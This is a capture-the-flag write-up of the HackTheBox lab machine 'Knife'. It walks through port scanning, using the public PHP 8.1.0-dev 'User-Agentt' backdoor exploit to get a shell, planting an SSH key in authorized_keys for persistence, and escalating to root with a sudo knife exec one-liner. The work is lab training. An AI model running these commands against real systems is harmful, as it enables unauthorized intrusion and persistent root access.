Writeup for the easy ranked HTB box Knife

Posted on Sep 15, 2021

Knife

“An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header. The following exploit uses the backdoor to provide a pseudo shell ont the host.”

This box is previously retired from Hackthebox active-session and in my opinion is a good “starting-box” if you are new to hacking. I spent a little to much time on poking on the webserver before I found the vulnerable PHP-dev version to get initial access but when I found that it was pretty straight forward. Tools I used on this box includes Nmap, DIRB, Nikto, Searchsploit and Burp. The environment I used was a kali-VM (in Parallels Desktop 17) on my MAC OS-machine (I either use a VM with Kali or a prepped Docker-image). Use this as a step-by-step guide or to see my structure when approaching a new box.

Lets go!

Reconnaissance

Starting of with a standard nmap-scan and it shows that port 22 and 80 is open. As soon as I see port 80 (or any webserver-port), I start dirb to see if I can find any interesting directories and nikto to find vulnerabilities for the website. This time either of the tools found anything of interest.

Port scanning with NMAP

┌──(erra㉿kali)-[~/htb/knife]
└─$ sudo nmap -T4 -Pn -p- -A knife.htb -o nmap.init
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-14 08:21 CEST
Nmap scan report for knife.htb (10.10.10.242)
Host is up (0.037s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=9/14%OT=22%CT=1%CU=40780%PV=Y%DS=2%DC=T%G=Y%TM=61403F9
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 256/tcp)
HOP RTT      ADDRESS
1   39.94 ms 10.10.14.1
2   40.82 ms knife.htb (10.10.10.242)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.99 seconds

Enumeration

Poking the website

Now I thought it was time to poke around on the website but didn’t find anything interesting, mostly a static webpage so after some time I started burpsuite to capture some traffic and my eyes caught the PHP-version (PHP/8.1.0-dev). Burp

Then I used searchsploit to see if there were any POC’s and luckily I found an RCE.

┌──(erra㉿kali)-[~/htb/knife]
└─$ searchsploit 8.1.0-dev
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                           |  Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution                                                                      | php/webapps/49933.py
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(erra㉿kali)-[~/htb/knife]
└─$ searchsploit -m 49933.py
  Exploit: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
      URL: https://www.exploit-db.com/exploits/49933
     Path: /usr/share/exploitdb/exploits/php/webapps/49933.py
File Type: Python script, ASCII text executable

Copied to: /home/erra/htb/knife/49933.py

Exploitation

Gaining initial access (user)

Reading through the exploit to understand what it does, where there was a backdoor planted in this specific version of PHP. This POC uses python3 with the requests, re and os libraries to provide a pseudo-shell. Pretty straight forward and we got user.txt from a crappy shell with the user james!

┌──(erra㉿kali)-[~/htb/knife]
└─$ python3 49933.py
Enter the full host url:
http://knife.htb

Interactive shell is opened on http://knife.htb
Can t acces tty; job crontol turned off.
$ whoami
james

$ cat home/james/user.txt
****************

Gaining SSH access

The initial shell I got were as usual pretty bad (with no autocomplete etc) and when I tried stabilising the shell it didn’t work right away so I ended up with just adding my public ssh-key to home/james/.ssh/authorized_keys by first generate a new ssh-structure:

┌──(erra㉿kali)-[~/tmp]
└─$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/erra/.ssh/id_rsa): id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in id_rsa
Your public key has been saved in id_rsa.pub
The key fingerprint is:
SHA256:2nui959CJSGp5xSvFu40NISfUR6NJ3/fGXERCW4+6k0 [email protected]
The key s randomart image is:
+---[RSA 3072]----+
|       . ooo ..o+|
|      . *.+.+  o.|
|       + *.= o  o|
|      . O o = .. |
|       *S+ o + .+|
|       oB . . ..o|
|      .+.o . E   |
|        +.+ o.   |
|      .o.+.+o.   |
+----[SHA256]-----+

Then echo in the id_rsa.pub data to the box authorized_keys

$echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDFpxnB9n9L2UXAc4/oiosxpxWqmUSnhueX4W8bU0Hc3tXH+d4HXG7cB1cKYP7BNkwBWdpSDHP79X4wQfPqhOgmkIL9RAaIRUqPEqttkkujWrTmC5HAIx1Kzm22QZnbtp27TKuOr4BSZ+G/4G8QK4eSpup6moiTeHdOI6LfUi9F8ytj7AHAaDk1WqRCtHBs2MCD1if4jzZ/GPFL8Q0J3LCC3jfYMcOdFt82D2quOzSMtqW4LPbOwwvOWrtIEzjvdNzh3F8uykC6wd6PD7H07g7ELX5lcBFu5zUsifQ6V+mT9SJR7aQu9k7tv6gSymq3RgKjxHwUVpyCk6ZyEwDLUeSt6S1hSdku1OMsDpBBOtgv+4PLiBlPGnlegupToVzx2Pr6F5jwisIK3CbtXzDrePbBaM7vMAHyVOSkMTz1Bwp3FZJsS388pos4w4hJudKSj9s7Q9kL8ltIoeUSSDYvBsARS8FWz/RT/r13FKjexRawoUEVaR8RqPwoicT7rJ2GzpU= [email protected]" > home/james/.ssh/authorized_keys

Privilege escalation

The first thing I always do when I have user is running the sudo -l command to see if my user can run anything as superuser. If this would not return anything useful I usually get linpeas.sh on to the box for further enumeration.

Quick enumeration of knife-box

But on this box, there was this knife-program the user james could run. After some research I figured out that it is a command-line tool that provides an interface between a local chef-repo and the Chef Infra Server Knife documentation. It seems like you can run ruby-scripts with the syntax /usr/bin/knife exec script.rb, let’s try to escalate privileges

┌──(erra㉿kali)-[~/htb/knife]
└─$ ssh -i id_rsa [email protected]
The authenticity of host 'knife.htb (10.10.10.242)' can t be established.
ECDSA key fingerprint is SHA256:b8jYX4F9OUtvZffH50q3L3B4hrSL/TxxPuue0hlbvRU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Failed to add the host to the list of known hosts (/home/erra/.ssh/known_hosts).
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 14 Sep 2021 10:25:34 AM UTC

  System load:             0.0
  Usage of /:              54.8% of 9.72GB
  Memory usage:            52%
  Swap usage:              0%
  Processes:               313
  Users logged in:         0
  IPv4 address for ens160: 10.10.10.242
  IPv6 address for ens160: dead:beef::250:56ff:feb9:8a73

99 updates can be applied immediately.
69 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Tue Sep 14 10:21:19 2021 from 10.10.14.10
[email protected]:~$
[email protected]:~$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
[email protected]:~$

Privilege escalation from user to root

First I found in the documentation that you could run ruby-scripts with the command /usr/bin/knife exec script.rb, here showing a POC on how easy it works

[email protected]:~$ cat script.rb
#!/usr/bin/env ruby

exec "ls"

[email protected]:~$ sudo /usr/bin/knife exec script.rb
script.rb  user.txt

Other way to escalate privileges

After some more research I found a quick one-liner on GTFObins

[email protected]:~$ sudo knife exec -E 'exec "/bin/sh"'
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
****************************

Summary

After all, as I said in the begining, this is an easy box and is good for beginners who are new to hacking. One of the most important things for me when learning is DOCUMENTATION, have a strategy and follow that, it is so easy to go down the rabbit-hole and loose many many hours on wrong things. Hope you found this writeup useful!

/Eric (cyberrauken)

Eric

HTB HTB